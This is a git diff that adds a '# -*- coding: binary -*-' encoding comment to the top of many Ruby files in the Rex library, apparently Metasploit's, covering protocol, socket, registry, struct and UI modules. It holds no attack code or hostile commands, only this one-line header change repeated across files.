diff --git a/lib/rex/proto/smb/constants.rb b/lib/rex/proto/smb/constants.rb
index 204ae788cb..e03085830a 100644
--- a/lib/rex/proto/smb/constants.rb
+++ b/lib/rex/proto/smb/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/constants.rb.ut.rb b/lib/rex/proto/smb/constants.rb.ut.rb
index 72440bda69..e0db0419df 100644
--- a/lib/rex/proto/smb/constants.rb.ut.rb
+++ b/lib/rex/proto/smb/constants.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/smb/crypt.rb b/lib/rex/proto/smb/crypt.rb
index 6c744acc0d..924c4be5e1 100644
--- a/lib/rex/proto/smb/crypt.rb
+++ b/lib/rex/proto/smb/crypt.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
module Rex
diff --git a/lib/rex/proto/smb/evasions.rb b/lib/rex/proto/smb/evasions.rb
index 2e68c9af5d..a3658a9922 100644
--- a/lib/rex/proto/smb/evasions.rb
+++ b/lib/rex/proto/smb/evasions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/exceptions.rb b/lib/rex/proto/smb/exceptions.rb
index 4f576bbc75..48e07f225e 100644
--- a/lib/rex/proto/smb/exceptions.rb
+++ b/lib/rex/proto/smb/exceptions.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/simpleclient.rb b/lib/rex/proto/smb/simpleclient.rb
index 183c639447..454a3c694e 100644
--- a/lib/rex/proto/smb/simpleclient.rb
+++ b/lib/rex/proto/smb/simpleclient.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Proto
module SMB
diff --git a/lib/rex/proto/smb/simpleclient.rb.ut.rb b/lib/rex/proto/smb/simpleclient.rb.ut.rb
index f3b0593662..e946f08278 100644
--- a/lib/rex/proto/smb/simpleclient.rb.ut.rb
+++ b/lib/rex/proto/smb/simpleclient.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/smb/utils.rb b/lib/rex/proto/smb/utils.rb
index c4597c05a4..f9cb3681c0 100644
--- a/lib/rex/proto/smb/utils.rb
+++ b/lib/rex/proto/smb/utils.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/text'
require 'rex/proto/smb/constants'
diff --git a/lib/rex/proto/smb/utils.rb.ut.rb b/lib/rex/proto/smb/utils.rb.ut.rb
index 8e64cdc346..6cc882ac19 100644
--- a/lib/rex/proto/smb/utils.rb.ut.rb
+++ b/lib/rex/proto/smb/utils.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/proto/sunrpc.rb b/lib/rex/proto/sunrpc.rb
index e6a3eb017d..3475c357f5 100644
--- a/lib/rex/proto/sunrpc.rb
+++ b/lib/rex/proto/sunrpc.rb
@@ -1 +1,2 @@
+# -*- coding: binary -*-
require 'rex/proto/sunrpc/client'
diff --git a/lib/rex/proto/sunrpc/client.rb b/lib/rex/proto/sunrpc/client.rb
index ea90b06784..3f713db516 100644
--- a/lib/rex/proto/sunrpc/client.rb
+++ b/lib/rex/proto/sunrpc/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/encoder/xdr'
diff --git a/lib/rex/proto/tftp.rb b/lib/rex/proto/tftp.rb
index 16bf85e582..2ed08237e4 100644
--- a/lib/rex/proto/tftp.rb
+++ b/lib/rex/proto/tftp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
#
# TFTP Server implementation according to:
diff --git a/lib/rex/proto/tftp/client.rb b/lib/rex/proto/tftp/client.rb
index f111f98733..90dcf85717 100644
--- a/lib/rex/proto/tftp/client.rb
+++ b/lib/rex/proto/tftp/client.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/proto/tftp'
require 'tempfile'
diff --git a/lib/rex/proto/tftp/constants.rb b/lib/rex/proto/tftp/constants.rb
index f1e8e813be..d29894c8bf 100644
--- a/lib/rex/proto/tftp/constants.rb
+++ b/lib/rex/proto/tftp/constants.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/proto/tftp'
diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb
index 20348992a5..89af4703cb 100644
--- a/lib/rex/proto/tftp/server.rb
+++ b/lib/rex/proto/tftp/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/socket'
require 'rex/proto/tftp'
diff --git a/lib/rex/proto/tftp/server.rb.ut.rb b/lib/rex/proto/tftp/server.rb.ut.rb
index 88fa952259..b767e0c2e4 100755
--- a/lib/rex/proto/tftp/server.rb.ut.rb
+++ b/lib/rex/proto/tftp/server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Revision$
#
diff --git a/lib/rex/registry.rb b/lib/rex/registry.rb
index cc67f232f8..a154c7fd7f 100644
--- a/lib/rex/registry.rb
+++ b/lib/rex/registry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/registry/hive'
require 'rex/registry/regf'
require 'rex/registry/nodekey'
diff --git a/lib/rex/registry/hive.rb b/lib/rex/registry/hive.rb
index 45e40d2aca..d64c9db3b1 100644
--- a/lib/rex/registry/hive.rb
+++ b/lib/rex/registry/hive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "regf"
require_relative "nodekey"
diff --git a/lib/rex/registry/lfkey.rb b/lib/rex/registry/lfkey.rb
index ad7aa371d4..29916ad179 100644
--- a/lib/rex/registry/lfkey.rb
+++ b/lib/rex/registry/lfkey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "nodekey"
module Rex
diff --git a/lib/rex/registry/nodekey.rb b/lib/rex/registry/nodekey.rb
index 31c7e6ac14..3ee70e9c59 100644
--- a/lib/rex/registry/nodekey.rb
+++ b/lib/rex/registry/nodekey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "lfkey"
require_relative "valuelist"
diff --git a/lib/rex/registry/regf.rb b/lib/rex/registry/regf.rb
index bfb719d95a..1b81bcc39f 100644
--- a/lib/rex/registry/regf.rb
+++ b/lib/rex/registry/regf.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Registry
diff --git a/lib/rex/registry/valuekey.rb b/lib/rex/registry/valuekey.rb
index 7e7241cb98..c5178c89b0 100644
--- a/lib/rex/registry/valuekey.rb
+++ b/lib/rex/registry/valuekey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Registry
diff --git a/lib/rex/registry/valuelist.rb b/lib/rex/registry/valuelist.rb
index 5bb186fb56..bf5e51448d 100644
--- a/lib/rex/registry/valuelist.rb
+++ b/lib/rex/registry/valuelist.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "valuekey"
module Rex
diff --git a/lib/rex/ropbuilder.rb b/lib/rex/ropbuilder.rb
index 930c010de2..635119972c 100644
--- a/lib/rex/ropbuilder.rb
+++ b/lib/rex/ropbuilder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module RopBuilder
diff --git a/lib/rex/ropbuilder/rop.rb b/lib/rex/ropbuilder/rop.rb
index 8169bacea7..aee2c11d26 100644
--- a/lib/rex/ropbuilder/rop.rb
+++ b/lib/rex/ropbuilder/rop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'metasm'
require 'rex/compat'
require 'rex/ui/text/table'
diff --git a/lib/rex/script.rb b/lib/rex/script.rb
index 85210c3fe0..8dbb87b485 100644
--- a/lib/rex/script.rb
+++ b/lib/rex/script.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
diff --git a/lib/rex/script/base.rb b/lib/rex/script/base.rb
index d6f0fbfe67..2982817d78 100644
--- a/lib/rex/script/base.rb
+++ b/lib/rex/script/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Script
class Base
diff --git a/lib/rex/script/meterpreter.rb b/lib/rex/script/meterpreter.rb
index 855658260b..7017a72a22 100644
--- a/lib/rex/script/meterpreter.rb
+++ b/lib/rex/script/meterpreter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Script
diff --git a/lib/rex/script/shell.rb b/lib/rex/script/shell.rb
index 431ed0304d..043a7bec5a 100644
--- a/lib/rex/script/shell.rb
+++ b/lib/rex/script/shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Script
diff --git a/lib/rex/service.rb b/lib/rex/service.rb
index 23f2dd0160..85a357adcb 100644
--- a/lib/rex/service.rb
+++ b/lib/rex/service.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
require 'rex/proto'
diff --git a/lib/rex/service_manager.rb b/lib/rex/service_manager.rb
index be31278ccb..95be371699 100644
--- a/lib/rex/service_manager.rb
+++ b/lib/rex/service_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
require 'rex'
require 'rex/service'
diff --git a/lib/rex/service_manager.rb.ut.rb b/lib/rex/service_manager.rb.ut.rb
index 605eee60b4..0386f0692c 100644
--- a/lib/rex/service_manager.rb.ut.rb
+++ b/lib/rex/service_manager.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/services/local_relay.rb b/lib/rex/services/local_relay.rb
index 09ec8b2ccc..5dab16b6fc 100644
--- a/lib/rex/services/local_relay.rb
+++ b/lib/rex/services/local_relay.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
require 'rex/socket'
diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb
index d4c81ae914..9374349c6e 100644
--- a/lib/rex/socket.rb
+++ b/lib/rex/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'socket'
require 'thread'
require 'resolv'
diff --git a/lib/rex/socket.rb.ut.rb b/lib/rex/socket.rb.ut.rb
index f0536d1288..25bcefa801 100644
--- a/lib/rex/socket.rb.ut.rb
+++ b/lib/rex/socket.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/socket/comm.rb b/lib/rex/socket/comm.rb
index efc86c7f5c..c2ed353517 100644
--- a/lib/rex/socket/comm.rb
+++ b/lib/rex/socket/comm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Rex
diff --git a/lib/rex/socket/comm/local.rb b/lib/rex/socket/comm/local.rb
index 6d61257efc..bd9be1ce04 100644
--- a/lib/rex/socket/comm/local.rb
+++ b/lib/rex/socket/comm/local.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
require 'rex/socket'
require 'rex/socket/tcp'
diff --git a/lib/rex/socket/comm/local.rb.ut.rb b/lib/rex/socket/comm/local.rb.ut.rb
index 92612e805f..760152f59e 100644
--- a/lib/rex/socket/comm/local.rb.ut.rb
+++ b/lib/rex/socket/comm/local.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/socket/ip.rb b/lib/rex/socket/ip.rb
index 57948331a7..77994e92e7 100644
--- a/lib/rex/socket/ip.rb
+++ b/lib/rex/socket/ip.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/parameters.rb b/lib/rex/socket/parameters.rb
index 4b41483d41..e4834b6ef8 100644
--- a/lib/rex/socket/parameters.rb
+++ b/lib/rex/socket/parameters.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/parameters.rb.ut.rb b/lib/rex/socket/parameters.rb.ut.rb
index 59f50c518d..2ab504e3c9 100644
--- a/lib/rex/socket/parameters.rb.ut.rb
+++ b/lib/rex/socket/parameters.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/range_walker.rb b/lib/rex/socket/range_walker.rb
index 6d82c80a6a..f8c57e95fc 100644
--- a/lib/rex/socket/range_walker.rb
+++ b/lib/rex/socket/range_walker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Rex
diff --git a/lib/rex/socket/range_walker.rb.ut.rb b/lib/rex/socket/range_walker.rb.ut.rb
index a73f20964d..c2aa6914a3 100644
--- a/lib/rex/socket/range_walker.rb.ut.rb
+++ b/lib/rex/socket/range_walker.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb
index 949ad3e375..2620808c41 100644
--- a/lib/rex/socket/ssl_tcp.rb
+++ b/lib/rex/socket/ssl_tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/ssl_tcp.rb.ut.rb b/lib/rex/socket/ssl_tcp.rb.ut.rb
index d9aa9149af..8a6809d831 100644
--- a/lib/rex/socket/ssl_tcp.rb.ut.rb
+++ b/lib/rex/socket/ssl_tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb
index 20d96a8f26..d600b94cc9 100644
--- a/lib/rex/socket/ssl_tcp_server.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/socket/tcp_server'
require 'rex/io/stream_server'
diff --git a/lib/rex/socket/ssl_tcp_server.rb.ut.rb b/lib/rex/socket/ssl_tcp_server.rb.ut.rb
index 62c72c1e03..9b26dd8376 100644
--- a/lib/rex/socket/ssl_tcp_server.rb.ut.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/subnet_walker.rb b/lib/rex/socket/subnet_walker.rb
index 11e8cccd3b..b781f08234 100644
--- a/lib/rex/socket/subnet_walker.rb
+++ b/lib/rex/socket/subnet_walker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Rex
diff --git a/lib/rex/socket/subnet_walker.rb.ut.rb b/lib/rex/socket/subnet_walker.rb.ut.rb
index e8f61d7acc..a65f5c56a2 100644
--- a/lib/rex/socket/subnet_walker.rb.ut.rb
+++ b/lib/rex/socket/subnet_walker.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/switch_board.rb b/lib/rex/socket/switch_board.rb
index 5205bb57aa..ae9a29e182 100644
--- a/lib/rex/socket/switch_board.rb
+++ b/lib/rex/socket/switch_board.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
require 'thread'
require 'rex/socket'
diff --git a/lib/rex/socket/switch_board.rb.ut.rb b/lib/rex/socket/switch_board.rb.ut.rb
index 1a797d6a65..4045beb7aa 100644
--- a/lib/rex/socket/switch_board.rb.ut.rb
+++ b/lib/rex/socket/switch_board.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/tcp.rb b/lib/rex/socket/tcp.rb
index 5967ffa1e8..8734dd8757 100644
--- a/lib/rex/socket/tcp.rb
+++ b/lib/rex/socket/tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/io/stream'
diff --git a/lib/rex/socket/tcp.rb.ut.rb b/lib/rex/socket/tcp.rb.ut.rb
index e73403c129..8818c8f735 100644
--- a/lib/rex/socket/tcp.rb.ut.rb
+++ b/lib/rex/socket/tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/tcp_server.rb b/lib/rex/socket/tcp_server.rb
index 7080b44dd3..8f2fbed22d 100644
--- a/lib/rex/socket/tcp_server.rb
+++ b/lib/rex/socket/tcp_server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/socket/tcp'
require 'rex/io/stream_server'
diff --git a/lib/rex/socket/tcp_server.rb.ut.rb b/lib/rex/socket/tcp_server.rb.ut.rb
index 32280dde0f..6acafd9186 100644
--- a/lib/rex/socket/tcp_server.rb.ut.rb
+++ b/lib/rex/socket/tcp_server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/udp.rb b/lib/rex/socket/udp.rb
index 8e29cf672d..7df7201300 100644
--- a/lib/rex/socket/udp.rb
+++ b/lib/rex/socket/udp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/udp.rb.ut.rb b/lib/rex/socket/udp.rb.ut.rb
index 2046fabac7..b72c37b048 100644
--- a/lib/rex/socket/udp.rb.ut.rb
+++ b/lib/rex/socket/udp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/struct2.rb b/lib/rex/struct2.rb
index cfc1c1ba88..957e54d7e5 100644
--- a/lib/rex/struct2.rb
+++ b/lib/rex/struct2.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# just a shim to load all of the Struct2 libraries
diff --git a/lib/rex/struct2/c_struct.rb b/lib/rex/struct2/c_struct.rb
index d39367eb06..444b992aa0 100644
--- a/lib/rex/struct2/c_struct.rb
+++ b/lib/rex/struct2/c_struct.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/c_struct_template.rb b/lib/rex/struct2/c_struct_template.rb
index 9a814f476b..99c51840e5 100644
--- a/lib/rex/struct2/c_struct_template.rb
+++ b/lib/rex/struct2/c_struct_template.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/constant.rb b/lib/rex/struct2/constant.rb
index b47a5521a2..2dfdc7ec9a 100644
--- a/lib/rex/struct2/constant.rb
+++ b/lib/rex/struct2/constant.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/element.rb b/lib/rex/struct2/element.rb
index 216cdae739..4909295952 100644
--- a/lib/rex/struct2/element.rb
+++ b/lib/rex/struct2/element.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/generic.rb b/lib/rex/struct2/generic.rb
index befe6b323f..217f30e5af 100644
--- a/lib/rex/struct2/generic.rb
+++ b/lib/rex/struct2/generic.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/restraint.rb b/lib/rex/struct2/restraint.rb
index 9826163ee7..e00b124ddb 100644
--- a/lib/rex/struct2/restraint.rb
+++ b/lib/rex/struct2/restraint.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/s_string.rb b/lib/rex/struct2/s_string.rb
index 74493f07db..92e8b7605c 100644
--- a/lib/rex/struct2/s_string.rb
+++ b/lib/rex/struct2/s_string.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/s_struct.rb b/lib/rex/struct2/s_struct.rb
index 2051cd5155..0a367c9823 100644
--- a/lib/rex/struct2/s_struct.rb
+++ b/lib/rex/struct2/s_struct.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/sync.rb b/lib/rex/sync.rb
index c64f505cda..75a130721b 100644
--- a/lib/rex/sync.rb
+++ b/lib/rex/sync.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/sync/thread_safe'
require 'rex/sync/ref'
diff --git a/lib/rex/sync/event.rb b/lib/rex/sync/event.rb
index f71c011cf5..eb3d1cd9bb 100644
--- a/lib/rex/sync/event.rb
+++ b/lib/rex/sync/event.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/sync/read_write_lock.rb b/lib/rex/sync/read_write_lock.rb
index f038d24445..edb7588397 100644
--- a/lib/rex/sync/read_write_lock.rb
+++ b/lib/rex/sync/read_write_lock.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/sync/ref.rb b/lib/rex/sync/ref.rb
index 1af98ab5e5..f768f257ef 100644
--- a/lib/rex/sync/ref.rb
+++ b/lib/rex/sync/ref.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/sync/thread_safe.rb b/lib/rex/sync/thread_safe.rb
index e766d5da2d..120b23cdf2 100644
--- a/lib/rex/sync/thread_safe.rb
+++ b/lib/rex/sync/thread_safe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
module Rex
diff --git a/lib/rex/test.rb b/lib/rex/test.rb
index 072b9383ee..380e85817d 100644
--- a/lib/rex/test.rb
+++ b/lib/rex/test.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'test/unit'
# DEFAULTS
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index bb71747686..1ce4943202 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'digest/md5'
require 'stringio'
diff --git a/lib/rex/text.rb.ut.rb b/lib/rex/text.rb.ut.rb
index 7c14bbb84f..d9c5520c3c 100644
--- a/lib/rex/text.rb.ut.rb
+++ b/lib/rex/text.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/thread_factory.rb b/lib/rex/thread_factory.rb
index 704312db28..a373af490f 100644
--- a/lib/rex/thread_factory.rb
+++ b/lib/rex/thread_factory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/time.rb b/lib/rex/time.rb
index 5735e82137..acfa6a19e5 100644
--- a/lib/rex/time.rb
+++ b/lib/rex/time.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/transformer.rb b/lib/rex/transformer.rb
index fa97a525e9..1454182e89 100644
--- a/lib/rex/transformer.rb
+++ b/lib/rex/transformer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/transformer.rb.ut.rb b/lib/rex/transformer.rb.ut.rb
index 151eed9ed7..26db466610 100644
--- a/lib/rex/transformer.rb.ut.rb
+++ b/lib/rex/transformer.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/ui.rb b/lib/rex/ui.rb
index 4422e11018..a45e8c6f4b 100644
--- a/lib/rex/ui.rb
+++ b/lib/rex/ui.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This file includes everything needed to interact with the user interface
# wrappers of the rex library.
diff --git a/lib/rex/ui/interactive.rb b/lib/rex/ui/interactive.rb
index f3f9bf9978..55af6023ac 100644
--- a/lib/rex/ui/interactive.rb
+++ b/lib/rex/ui/interactive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
diff --git a/lib/rex/ui/output.rb b/lib/rex/ui/output.rb
index b2a0cf18f9..220ec68831 100644
--- a/lib/rex/ui/output.rb
+++ b/lib/rex/ui/output.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/output/none.rb b/lib/rex/ui/output/none.rb
index 14bb7a55bf..c9eafd2a96 100644
--- a/lib/rex/ui/output/none.rb
+++ b/lib/rex/ui/output/none.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/progress_tracker.rb b/lib/rex/ui/progress_tracker.rb
index 9b1d886b25..7b5992f618 100644
--- a/lib/rex/ui/progress_tracker.rb
+++ b/lib/rex/ui/progress_tracker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
diff --git a/lib/rex/ui/subscriber.rb b/lib/rex/ui/subscriber.rb
index baa89d8c60..542da35181 100644
--- a/lib/rex/ui/subscriber.rb
+++ b/lib/rex/ui/subscriber.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
diff --git a/lib/rex/ui/text/color.rb b/lib/rex/ui/text/color.rb
index 9298c60095..5a8b25b90f 100644
--- a/lib/rex/ui/text/color.rb
+++ b/lib/rex/ui/text/color.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
module Text
diff --git a/lib/rex/ui/text/color.rb.ut.rb b/lib/rex/ui/text/color.rb.ut.rb
index 5bb9bcb942..c20de93a24 100644
--- a/lib/rex/ui/text/color.rb.ut.rb
+++ b/lib/rex/ui/text/color.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb
index 7095853a0c..2dd3f904e2 100644
--- a/lib/rex/ui/text/dispatcher_shell.rb
+++ b/lib/rex/ui/text/dispatcher_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'pp'
diff --git a/lib/rex/ui/text/input.rb b/lib/rex/ui/text/input.rb
index 8dfac2f065..511e36431d 100644
--- a/lib/rex/ui/text/input.rb
+++ b/lib/rex/ui/text/input.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/buffer.rb b/lib/rex/ui/text/input/buffer.rb
index 93d4e44e75..9f22c24eb0 100644
--- a/lib/rex/ui/text/input/buffer.rb
+++ b/lib/rex/ui/text/input/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/readline.rb b/lib/rex/ui/text/input/readline.rb
index 4a0105acd2..50a2bd4867 100644
--- a/lib/rex/ui/text/input/readline.rb
+++ b/lib/rex/ui/text/input/readline.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/socket.rb b/lib/rex/ui/text/input/socket.rb
index 60b3a7b901..82e8469b5e 100644
--- a/lib/rex/ui/text/input/socket.rb
+++ b/lib/rex/ui/text/input/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/stdio.rb b/lib/rex/ui/text/input/stdio.rb
index 42c8ca9c3a..ddc3de1810 100644
--- a/lib/rex/ui/text/input/stdio.rb
+++ b/lib/rex/ui/text/input/stdio.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/irb_shell.rb b/lib/rex/ui/text/irb_shell.rb
index a3f63ac8b5..10cd345a65 100644
--- a/lib/rex/ui/text/irb_shell.rb
+++ b/lib/rex/ui/text/irb_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
module Text
